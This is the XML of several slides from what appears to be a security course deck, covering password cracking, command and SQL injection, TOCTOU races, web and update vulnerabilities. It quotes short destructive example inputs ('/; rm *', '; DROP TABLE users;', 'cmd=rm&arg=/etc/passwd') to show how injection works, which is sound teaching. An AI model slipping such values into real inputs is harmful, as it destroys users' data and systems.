          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977592" y="1875473"/>
            <a:ext cx="10452408" cy="4663440"/>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Weak passwords and password crackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Open accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Elevation of privilege</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Names vs secure names</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Allows an attacker to guess a person's user name, password, credit card number, or cryptographic key by using an automated process of trial and error.</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Weak keys</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Poor key management</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Root key stores</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Compromised certificate authorities</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137</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24182287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4" y="63183"/>
            <a:ext cx="11739716" cy="732685"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499100" y="1875473"/>
            <a:ext cx="11582400" cy="3596859"/>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Suppose I call command with unchecked user input.  Example:</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ls –lt $userinput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What happens if use input is “/; rm *”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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138</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="446158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4" y="12384"/>
            <a:ext cx="11739716" cy="935885"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1875473"/>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For example, a web form on a website might request a user’s account name and then send it to the database in order to pull up the associated account information using dynamic SQL like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“SELECT * FROM users WHERE account = ‘“ + userProvidedAccountNumber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Suppose userProvidedAccountNumber is “*; DROP TABLE users;”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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139</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45885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12838"/>
            <a:ext cx="11305622" cy="1094331"/>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2: system software</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539545" y="2075935"/>
            <a:ext cx="11112910" cy="4645541"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>System software, you should understand each of these elements of “system software” for a typical OS like Linux.</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Operating systems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Kernels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Memory control</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I/O control: device drivers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Operating systems user mode services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Hypervisors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Configuration files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Logs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API’s and writing application programs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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129490242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TOCTOU attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1845663"/>
            <a:ext cx="11582400" cy="4663440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>From Wikipedia: The following C code, when used in a setuid program, has a TOCTOU bug:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pP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(access("file", W_OK) != 0) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  exit(1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd = open("file", O_WRONLY);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>write(fd, buffer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(buffer));</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Here </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is intended to check whether the real user who executed the setuid program would normally be allowed to write the file.</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An attacker can exploit the race condition between the access and open to trick the setuid victim into overwriting an entry in the system password database.</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TOCTOU races can be used for privilege escalation, to get administrative access to a machine.</a:t>
            </a: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140</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419279199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Resource exhaustion vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699001" y="1931407"/>
            <a:ext cx="10793998" cy="4265485"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Swap space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Non-volatile memory – e.g., SD cards.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>If you’re lucky these just cause reboots and DOS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Sometimes you’re not lucky </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141</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8896043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User as vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="398973" y="2134713"/>
            <a:ext cx="11249891" cy="3868615"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Bad file protections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Unencrypted messaging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Sure, go ahead and run that binary I downloaded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Poor passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Poor update hygiene</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Unvetted applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US"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142</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17775404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Web Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="555585" y="1876662"/>
            <a:ext cx="10903352" cy="4149739"/>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Cross-Site scripting (XSS)  - enables attackers to introduce client-side code into web services violating domain restrictions.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Cross-site request forgery (CSRF) -  change page “state” variables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Access Control,  Identity Management  and Session management – authentication and authorization information stored in cookies.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Business logic flaws </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Parameters and CGI scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ipts – http URL can contain parameters.   For example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://example.com/path/to/page?name=john&amp;title=ceo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.  Many IoT interfaces use this to specify program execution: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://example.com/path/to/page?cmd=rm&amp;arg=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/etc/passwd.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:effectLst/>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143</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382272664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7050"/>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Update vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1727200"/>
            <a:ext cx="10676238" cy="4148667"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>If you can either back out an update that patches a vulnerability or, better still, introduce an update that has deliberate backdoors or vulnerabilities, you can completely subvert critical programs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Example: change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Protocols (telnet v ssh)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Avoid a barrier (proxy, …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Introduce a doctored program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Introduce a side channel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144</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="390125297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Code you never see</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1031096" y="1692911"/>
            <a:ext cx="10659335" cy="4663440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Pre-boot and boot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
